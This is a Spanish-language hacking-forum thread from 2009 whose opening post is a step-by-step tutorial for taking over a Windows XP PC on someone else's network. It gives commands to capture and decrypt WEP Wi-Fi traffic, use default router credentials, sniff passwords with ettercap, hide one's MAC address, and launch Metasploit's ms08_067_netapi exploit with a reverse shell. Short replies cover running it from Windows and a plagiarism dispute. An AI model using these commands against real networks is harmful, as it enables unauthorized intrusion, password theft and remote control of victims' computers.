elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Tuto: Entrando a un PC en LAN
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Tuto: Entrando a un PC en LAN  (Leído 6,808 veces)
rockernault


Desconectado Desconectado

Mensajes: 2.046


Linux User!!!


Ver Perfil
Tuto: Entrando a un PC en LAN
« en: 15 Diciembre 2009, 16:55 pm »

Tutorial: Explotando vulnerabilidades en LAN con Metasploit


Inicio: Este tutorial ha sido hecho con el fin de poner en evidencia el descuido de los user al negarse a actualizar su Windows, si bien por ignorancia, o por que su windows no es original, ignorando que tras cada inocente numero se oculta un peligro mucho mas grande, el poder controlar su equipo remotamente, aprovechando una vulnerabilidad que pudo haber sido parcheada desde Windows Update o desde la web del fabricante del Software, tal es el caso de Adobe 8.1.1 que tiene mas vulnerabilidades que deberia tener un simple lector de pdf's.

Veamos el Equipo a utilizar:

Ubuntu Linux 9.04 (atacante) Atheros AR5007EG

Windows XP SP3 (victima) Realtek PCI Ethernet

Metasploit 3.5 Framework (Lo haremos a consola, me gusta mas)

CABE ACLARAR QUE NO BORRE LAS MAC PORQUE ES EQUIPO VIEJO, QUE USE DE PRUEBA, por eso no me moleste en borrarlas, ya que el router que use, solo lo conecte para eso,de igual manera el xp, solo lo instale para esto, asimismo las wifi y ethernet, son equipo sin uso, y sin importancia


paso 1: Planeando el Golpe:

para planear el golpe, necesitamos hacernos de herramientas utiles, confiables y soporte de hard bueno y eficiente, para que no nos deje tirados a medio camino, veamos nuestra lista de herramientas:

Metasploit:



ettercap 0.7.3 un viejo favorito de todos, la GUI es mas util para propositos de este manual



Acer Aspire One

1gb de ram
Intel Atom a 1.6 Ghz
Y la roba carteras Atheros AR5007EG


paso 2: Estudiando a la victima:

La victima es un user tipico, sin mucho que hacer en un sistema XP clasico, sin actualizar, por miedo a que la copia de Windows no es original, (claro que lo es, ya que venia con el sistema) pero igual, insisto en que actualize y el replica, diciendo que no es necesario... bueno...

Tiene algunos metroflogs, navega por Wi-Fi, messenger y tiene a cargo de la seguridad el peor vigilante,  ESET Smart Security v4 con fix y crack y demas tonterias.. menudo usuario.. ademas de no darse cuenta de que tiene algunas carpetas compartidas.. lo cual puede ser interesante... pero a la vez algo totalmente inutil, ya que no voy por sus archivos, sino a hacerme con el control total del sistema, no tengo ningun interes en joderle sus trabajos, ya que de seguro le ha costado esfuerzo hacerlo...


PAso 3: Infiltracion

Tiene una conexion de 1mb, ISP Megacable, con un clasico modem motorola poco eficiente, pero es suficiente para navegar en internet, ya que usa cifrado WEP, entremos a su wifi, GUARDANDO LOS PAQUETES en .cap, usando el comando:

Código:
sudo airodump-ng --write hack --channel X <interfaz>



luego procedemos a desencriptarlo

(son pocos porque no quiero pasar buen rato capturando tonterias)

Código:
sudo airdecap-ng -w wepkey hack-01.cap



ya despues de haber sacado la pass del WIFI procedemos a explorar:


Paso 4: Explorando tierras desconocidas:

Por Seguridad, recomiendo que se cambien la MAC del Dispositivo, con macchanger-gtk o a mano con ifconfig/iwconfig, despues de que tomamos la seguridad necesaria... exploremos un poco en el router/gateway/puerta de enlace, si es que conseguimos acceso a el...



rango de IP: 192.168.0.10-26
Gateway:     192.168.0.1
user/pass     por defecto
WIFI users    2/2  WIFI/Ethernet
Objetivo:     192.168.0.10
SO:           WinXP SP3
Hard          P4 3.0 Ghz, 1gb RAM Dell Presicion 9150

importantisimo el decir que la pass y el user por defecto, puedes pillarlos en internet... bastante sencillo, tambien cabe aclarar que no es obligatoriamente necesario ownear al gateway... nosotros vamos a por el objetivo, no por sus archivos o su conexion, sino por su PC

luego con ettercap-ng  vemos que ha pasado por su modem en el instante que le sniffabamos, (esto es necesario cuando no tenemos acceso al router, mas que nada para ver IPs de lan, en caso de DHCP deshabilitado, o para ver otros dispositivos de la LAN, impresoras, scanners, camaras de vigilancia, etc)

abrimos el hack-01-dec.cap, que es la captura ya descifrada y le damos a Start Sniffing, el programa hablara por si solo, si es que tiene algo que decir



WTF???

le hemos pillado las pass de los 3 metroflogs y un hash de un admin de smb, un servicio para compartir recursos en sistemas windows.. vaya que cosas pasan por los modems... es casi imposible creerlo, no me agrada lo que he sacado, me confunde el que haya un dominio, y el admin intentando loguearse, pero en fin, quizas...

1.-No es el usuario que pensamos, quiza es una trampa bien elaborada
2.-Es una mini red privada con muchos equipos entrando y saliendo
    (pero no es posible, ya que la DHCP table, no indica mas que 4 equipos, tal vez la DHCP table, no guarda logs, solo muestra equipos en tiempo real)

¬¬ hmmm....  da igual, entraremos a fuerza.. de eso es el hacking

resumiendo esta area, tienes 2 opciones de exploracion:

1.- Entras a la WIFI como puedas,
2.-Puedes entrar al router y ver los host o puedes scanear los host por medio de ettercap
3.-si tu objetivo se conecta por WIFI, tienes 2 opciones, MITM con ettercap o capturar con airodump-ng y luego desencriptarle con airdecap y analizarle con ettercap
4.-si tu objetivo es por Ethernet, solo te queda la opcion de MITM con ettercap..
5.-en ambos casos (wifi/ethernet) el MITM se realiza de la misma forma, e independientemente del SO



paso 5:Limpiando y cerrojando Metasploit

A grandes rasgos podria decir que Metasploit es un set de exploits ya compilados y ya listos para la accion, preparados para ejecutarse y poder quebrantar la debil seguridad de un sistema Windows

instalamos metasploit desde su archivo .run bajado desde su web.

y luego en la terminal ejecutamos

Código:
sudo msfconsole

esperamos a que carguen los exploits y veremos la interfaz de metasploit tan interesante como su poder oculto..



hagamos un recuento, Win XP, no actualizaciones + SMB + NOD32fix + user tipico = control total del PC

podemos usar varios tipos de exploits, SMB me agrada y tiene mucho para ver:

es cuestion de poner en MSF

Código:
show exploits

y saldra algo com esto:


Código:
windows/smb/ms06_066_nwapi                                     good       Microsoft Services MS06-066 nwapi32.dll
   windows/smb/ms03_049_netapi                                    good       Microsoft Workstation Service NetAddAlternateComputerName Overflow
   windows/smb/smb2_negotiate_func_index                          good       Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
   windows/smb/ms04_031_netdde                                    good       Microsoft NetDDE Service Overflow
   windows/smb/msdns_zonename                                     great      Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)
   windows/smb/psexec                                             excellent  Microsoft Windows Authenticated User Code Execution
   windows/smb/ms04_011_lsass                                     great      Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow
   windows/smb/ms08_067_netapi                                    great      Microsoft Server Service Relative Path Stack Corruption
   windows/smb/netidentity_xtierrpcpipe                           great      Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow.
   windows/smb/ms06_025_rras                                      average    Microsoft RRAS Service Overflow
   windows/smb/ms05_039_pnp                                       good       Microsoft Plug and Play Service Overflow
   windows/smb/ms04_007_killbill                                  low        Microsoft ASN.1 Library Bitstring Heap Overflow
   windows/smb/ms06_066_nwwks                                     good       Microsoft Services MS06-066 nwwks.dll
   windows/smb/ms06_025_rasmans_reg                               good       Microsoft RRAS Service RASMAN Registry Overflow
   windows/smb/ms06_040_netapi                                    great      Microsoft Server Service NetpwPathCanonicalize Overflow
   windows/smb/smb_relay                                          excellent  Microsoft Windows SMB Relay Code Execution

hmmm cual elegire..?? elegire.. este!

windows/smb/ms08_067_netapi

refiere a una vulnerabilidad en SMB que permite ejecutar codigo remoto, muy interesante:

empecemos:

para seleccionar el exploit, ponemos en consola:

Código:
use windows/smb/ms08_067_netapi

y saldra asi:



despues, lo configuramos, poniendo:

Código:
show options

asi:




RHOST: Ip del objetivo en LAN
RPORT: puerto del servicio afectado
SMBPIPE: nombre para usar del SMB pipe

si queremos cambiar/poner alguno de estos parametros, ponemos:

Código:
set RHOST 192.168.0.10
Código:
set RPORT 445

o lo que necesitemos, no siempre son estos valores ni esta la config...

luego tendremos que seleccionar el codigo remoto que ejecutara despues de triggerear la vulnerabilidad, llamada payload

Código:
show payloads



y estas son las mas importantes,

windows/shell_reverse_tcp                        normal  Windows Command Shell, Reverse TCP Inline
generic/shell_bind_tcp                           normal  Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp                        normal  Generic Command Shell, Reverse TCP Inline
windows/shell/bind_tcp                           normal  Windows Command Shell, Bind TCP Stager

2 bind para conectarse directamente y 2 reverses para que la victima se conecte a ti..

despues de selecciona la payload hay que seleccionar sus opciones, yo seleccione la primera de la lista
Código:
show options



para luego poner las opciones de la payload con estos comandos, elegi la payload de reverse connection porque se me hace mas facil, la reverse connection

Código:
set LHOST <tu ip de lan>
Código:
set LPORT 445

una vez listos todos los comandos y colocadas todas las ip, procedemos al ataque, ejecutando en metasploit el comando "exploit"

2da parte:

Tierras desconocidas... en proceso

Errores y demas, aqui por favor

Un Saludo

En línea




fede_cp


Desconectado Desconectado

Mensajes: 527


"porque pensar nunca fue entender"


Ver Perfil WWW
Re: Tuto: Entrando a un PC en LAN
« Respuesta #1 en: 15 Diciembre 2009, 18:03 pm »

Genial!!, solo una pregunta, el ataque si es lanzado desde windows funciona igual?


saludos
En línea

somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!
rockernault


Desconectado Desconectado

Mensajes: 2.046


Linux User!!!


Ver Perfil
Re: Tuto: Entrando a un PC en LAN
« Respuesta #2 en: 15 Diciembre 2009, 18:16 pm »

todas las herramientas mencionadas existen en windows,

pero no he podido hacerlas funcionar correctamente, en especial en metasploit
En línea




fede_cp


Desconectado Desconectado

Mensajes: 527


"porque pensar nunca fue entender"


Ver Perfil WWW
Re: Tuto: Entrando a un PC en LAN
« Respuesta #3 en: 15 Diciembre 2009, 18:32 pm »

claro, se comento por ahi, que el metasploit no funciona correctamente en windows, nose porque será


saludos y gracias por la respuesta

PD: estaría bueno que se explique de un modo de hacerlo pero en windows.
En línea

somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!
rockernault


Desconectado Desconectado

Mensajes: 2.046


Linux User!!!


Ver Perfil
Re: Tuto: Entrando a un PC en LAN
« Respuesta #4 en: 15 Diciembre 2009, 19:15 pm »

Windows no creo que sea buena idea..

si vas a hackear algo, necesitas un sistema linux... porque ya trae todas la herramientas a un comando de distancia
En línea




kamsky
Colaborador
***
Desconectado Desconectado

Mensajes: 2.218


Como no sabían que era imposible, lo hicieron...


Ver Perfil
Re: Tuto: Entrando a un PC en LAN
« Respuesta #5 en: 15 Diciembre 2009, 20:59 pm »

permiteme decirte algo, quizás esté equivocado, pero es mi impresión...

todo el concepto del tuto es MUY parecido a algunos que he hecho yo, por no decir que son casi iguales, y cuando veo el nombre de la 2ª parte, no puedo más que seguir dudando... :-\
En línea

----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!
rockernault


Desconectado Desconectado

Mensajes: 2.046


Linux User!!!


Ver Perfil
Re: Tuto: Entrando a un PC en LAN
« Respuesta #6 en: 15 Diciembre 2009, 21:12 pm »

¬¬ extraño... 

se me ocurrio, porque al igual que estuve trabajando con ettercap, estuve trabajando con metasploit, y decidi que era buena idea hacer un tuto de como se usa metasploit... en entornos caseros... compre un router motorola, y una tarjetas de red nuevas para las pruebas de concepto...

y lo escribi entre ayer y hoy... pero no tuve acceso a internet y por eso me decidi a escribirlo, usando screenshots y material que por alli tenia, de una conferencia de seguridad en mi escuela, .caps, windows SP3, etc etc


no me sorprende que lo menciones, lo que me sorprende es que puedas pensar que lo copie y lo publique con mi nombre, en tu territorio.. eso pues ¬¬

tal vez sea la forma de redactarlo, o algo, o porque use el mismo exploit que tu..

el ms08-067, pero era mi objetivo usar ese, y no otro, porque es muy sencillo de usar y no requiere tanta config para explotarlo...

¬¬ no se que mas decir... me siento algo confundido,  :-\ y no se que hacer
En línea




kamsky
Colaborador
***
Desconectado Desconectado

Mensajes: 2.218


Como no sabían que era imposible, lo hicieron...


Ver Perfil
Re: Tuto: Entrando a un PC en LAN
« Respuesta #7 en: 15 Diciembre 2009, 21:37 pm »

no no, no he dicho en ningún momento que lo hayas cogido y cambiado el nombre, porque es obvio que no, sólo digo que según MI PERCEPCIÓN el modo y el fondo del ataque es bastante parecido al de algún paper que yo he hecho, pero si tu me dices que no, te creo 100%

salu2 y buen material, sigue aportando
En línea

----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!
rockernault


Desconectado Desconectado

Mensajes: 2.046


Linux User!!!


Ver Perfil
Re: Tuto: Entrando a un PC en LAN
« Respuesta #8 en: 15 Diciembre 2009, 21:50 pm »

lo que pasa y lo que puedo pensar que es..

es que intente redactarlo en la forma en que lo haces tu..

porque lo considero un modo mas ordenado de redactar un tutorial..

pero en fin..

ni que decir...

saludos

En línea




Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
entrando a camara
Hacking
zerocoolcom 2 3,283 Último mensaje 1 Mayo 2011, 13:34 pm
por Søra
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines